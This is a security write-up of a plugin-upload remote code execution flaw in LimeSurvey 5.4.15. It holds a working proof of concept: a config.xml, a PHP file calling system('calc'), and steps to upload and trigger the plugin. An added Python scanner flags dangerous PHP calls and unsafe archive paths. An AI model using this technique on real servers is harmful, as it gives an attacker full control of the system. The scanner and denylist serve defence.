LimeSurvey-5.4.15-PluginUploadtoRCE
LimeSurvey 5.4.15 has a vulnerability in the plugin manager (index.php/admin/pluginmanager): an uploaded plugin package can carry arbitrary PHP, which leads to remote code execution (RCE).
Impact: Complete control of the system.
The directory structure of the files we need is as follows:
Here are the attack steps:
- Create a config.xml as follows, and note the plugin name in the name element (exp), since the PHP file must use the same name:
<?xml version="1.0" encoding="UTF-8"?>
<config>
<metadata>
<name>exp</name>
<type>plugin</type>
<creationDate>2021-11-18</creationDate>
<lastUpdate>2021-11-23</lastUpdate>
<author>Denis Chenu (for Respondage)</author>
<authorUrl>https://www.respondage.nl</authorUrl>
<supportUrl>https://www.limesurvey.org</supportUrl>
<version>0.2.1</version>
<license>GNU General Public License version 3 or later</license>
<description><![CDATA[Expression Script: make answer option text available; see settings for documentation and usage.]]></description>
</metadata>
<compatibility>
<version>5.0</version>
</compatibility>
<updaters disabled="disabled">
</updaters>
</config>
- Create a PHP file with the same name (exp.php) and put your payload in it, for example:
<?php
system('calc');
?>
- Compress config.xml and exp.php into one archive, e.g. exp.zip:
- Upload this exp.zip file at /index.php/admin/pluginmanager?sa=index :
- Finally, when you click the uploaded plugin in the plugin manager, the PHP payload is executed:
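As an added example (not part of the original write-up and not LimeSurvey code), here is a Python script an administrator can run over a plugin archive before installing it through the plugin manager. It parses config.xml for the plugin name, treats every member containing a PHP open tag as executable code, and flags calls to command-execution or code-evaluation functions as well as unsafe archive paths. The archive it inspects is constructed in memory from the two files shown above; the denylist of function names and the block/allow decision are this example's own choices.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Functions that hand a string to a shell or to the PHP interpreter. A survey
# plugin has little reason to call them, so their presence is worth a review
# before installation. This denylist is the example's own choice, not a
# LimeSurvey setting.
DANGEROUS_CALLS = (
    "system", "exec", "shell_exec", "passthru", "proc_open", "popen",
    "eval", "assert", "create_function",
)
CALL_RE = re.compile(r"\b(" + "|".join(DANGEROUS_CALLS) + r")\s*\(", re.IGNORECASE)


def build_sample_archive(php_source=b"<?php\nsystem('calc');\n?>"):
    """Constructed sample: a plugin ZIP laid out like the one in the write-up.

    The PHP body defaults to the payload from the write-up so the scanner
    has something to flag; pass a different body to test a benign plugin.
    """
    config_xml = b"""<?xml version="1.0" encoding="UTF-8"?>
<config>
  <metadata>
    <name>exp</name>
    <type>plugin</type>
  </metadata>
</config>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("config.xml", config_xml)
        zf.writestr("exp.php", php_source)
    return buf.getvalue()


def inspect_plugin_archive(zip_bytes):
    """Return a report describing what installing this archive would place on disk."""
    report = {"plugin_name": None, "php_files": [], "findings": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        config_name = next((n for n in names if n.lower().endswith("config.xml")), None)
        if config_name is None:
            report["findings"].append("no config.xml: not a valid plugin package")
            return report

        root = ET.fromstring(zf.read(config_name))
        name_el = root.find("./metadata/name")
        if name_el is not None and name_el.text:
            report["plugin_name"] = name_el.text.strip()

        for member in names:
            # Reject absolute paths and ".." components so extraction cannot
            # escape the plugin directory (zip slip).
            if member.startswith("/") or ".." in member.split("/"):
                report["findings"].append(f"unsafe path in archive: {member}")
            data = zf.read(member)
            # Anything with a PHP open tag is executable code, whatever its extension.
            if member.lower().endswith(".php") or b"<?php" in data:
                report["php_files"].append(member)
                for m in CALL_RE.finditer(data.decode("utf-8", "replace")):
                    report["findings"].append(f"{member}: calls {m.group(1)}()")
    return report


def should_block(report):
    """Simple policy: any finding blocks installation pending manual review."""
    return bool(report["findings"])


if __name__ == "__main__":
    for line in inspect_plugin_archive(build_sample_archive())["findings"]:
        print(line)
```

The check is intentionally a static gate, not a sandbox: it does not execute the plugin, so it cannot be tricked into running the payload, but obfuscated code (for example a function name assembled at runtime) will slip past the regex. Pair it with a review of every PHP file the report lists rather than relying on the denylist alone.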